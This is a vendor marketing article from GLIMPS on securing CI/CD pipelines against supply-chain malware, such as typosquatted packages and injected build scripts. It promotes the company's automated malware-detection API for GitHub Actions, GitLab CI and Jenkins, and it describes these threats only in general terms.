CI/CD Security: Advanced Malware Detection for DevOps Pipelines with GLIMPS Malware

When it comes to attack vectors, cybercriminals are increasingly innovative in infiltrating areas where they’re least expected. In recent years, attention has turned to a previously overlooked target: the CI/CD pipeline. Widely used by developers to automate software delivery, this fluid and fast-paced process relies on poorly secured foundations. It therefore represents a prime attack surface for cybercriminals, who can insert malicious code at various stages of the development cycle.

It’s precisely this lack of control, combined with the massive importation of third-party dependencies, that makes it a blind spot in companies’ cybersecurity strategies.

Why does the development phase, particularly the CI/CD pipeline, remain so poorly secured despite its central role in software construction? How do cyberattackers operate to infiltrate them? And how can proactive detection be integrated without disrupting the DevOps philosophy based on continuous deployment?

Insights and answers from our experts.

With the democratization of cloud computing and microservices, software development has scaled up significantly. Long reserved for specialized publishers, the DevOps philosophy is now commonplace in most companies – banks, telecom operators, manufacturers, public sector organizations – that design their own business tools internally.

As Timothée Billet, Sales Director at GLIMPS, emphasizes: “Customer portals, extranets, business APIs, mobile applications, internal automation: software has become an essential building block of business activity, regardless of company size or sector.”

This shift has been made possible largely thanks to the CI/CD (Continuous Integration / Continuous Delivery) model, which automates the stages of the development cycle: code validation, testing, compilation, packaging, and production deployment – all without human intervention.

According to a 2024 report published by JetBrains, 50% of developers regularly use CI/CD tools. This democratization is most often accompanied by a paradigm shift in security.

By relying on external components – such as open source library repositories and third-party scripts – dependencies are automatically downloaded from public registries like npm, PyPI, or Maven. While this automation brings fluidity to the production phase, it eliminates many manual controls that developers previously performed in the validation cycle.

What flows through the CI/CD pipeline is therefore not always visible or controlled. And the smoother the integration, the greater the exposure. This gap between technical performance and security control is now at the heart of new threats facing the development chain.

Designed primarily to accelerate development cycles, the CI/CD pipeline rarely integrates cybersecurity solutions. In most organizations, security controls apply before the production phase or to user workstations. But malicious code can infiltrate much earlier.

As often happens, the modus operandi is simple and well-known: an attacker simply needs to publish a malicious package with a deceptive name for it to be mistakenly integrated into a project. “An approach already used in mobile app stores. This was the case with ‘Deepseeek‘ – a fake Python library impersonating ‘Deepseek’, the Chinese-origin LLM published in January 2025. Once installed, this fake library exfiltrated the user’s local data,” explains Alexis Peru, Solution Architect at GLIMPS.

Other attacks target the pipeline directly. Malicious scripts can be injected into CI/CD tool configuration files, such as Jenkins¹, to execute arbitrary code during build or deployment phases.

These scenarios are not theoretical. Palo Alto Networks’ Red Team (Unit42) demonstrated the feasibility of complete pipeline compromise, drawing inspiration from the SolarWinds Orion supply chain attack. Their tests revealed structural flaws: lack of artifact verification, absence of traceability, implicit trust in all workflow elements.

¹Source: xygeni.io

Faced with these new forms of software compromise, proactive detection becomes essential. This is where GLIMPS Malware Detect fits in – a solution designed to integrate malware detection directly into CI/CD pipelines without disrupting the development cycle.

The strength of GLIMPS Malware Detect lies in its fully automated operation. Once the API is integrated into a pipeline – GitHub Actions, GitLab CI, Jenkins, or any other orchestrator – every file, library, or generated artifact can be analyzed in real-time. The objective is clear: detect any attempt to introduce malicious code as soon as it’s created, before it’s deployed or integrated into a final product.

Unlike traditional security tools, often designed for production or endpoints, GLIMPS integrates upstream, into the development processes themselves. This allows blocking compromised files well before they have any chance of reaching a production environment.

The analysis relies on a proprietary engine, combining machine learning algorithms and binary analysis, capable of identifying known and unknown malware, as well as suspicious behaviors, even without signatures. Integration is done through Python or Go libraries, available as open source on GLIMPS’s public GitHub repository, facilitating adoption even in highly agile DevOps environments.

Beyond detection, GLIMPS guarantees data sovereignty and confidentiality: analyzed files are neither stored nor shared. Analysis can be hosted in France, or directly in the client’s infrastructure, ensuring complete isolation – a determining factor in sensitive sectors.

As CI/CD pipelines become indispensable in software development, their security remains largely underestimated. By integrating malware detection at the heart of the pipeline itself, GLIMPS Malware Detect enables securing software deliveries without slowing down deployments and innovation.

Want to test GLIMPS integration in your CI/CD pipeline? Discover our ready-to-use libraries on GitHub or contact our team for a personalized demonstration.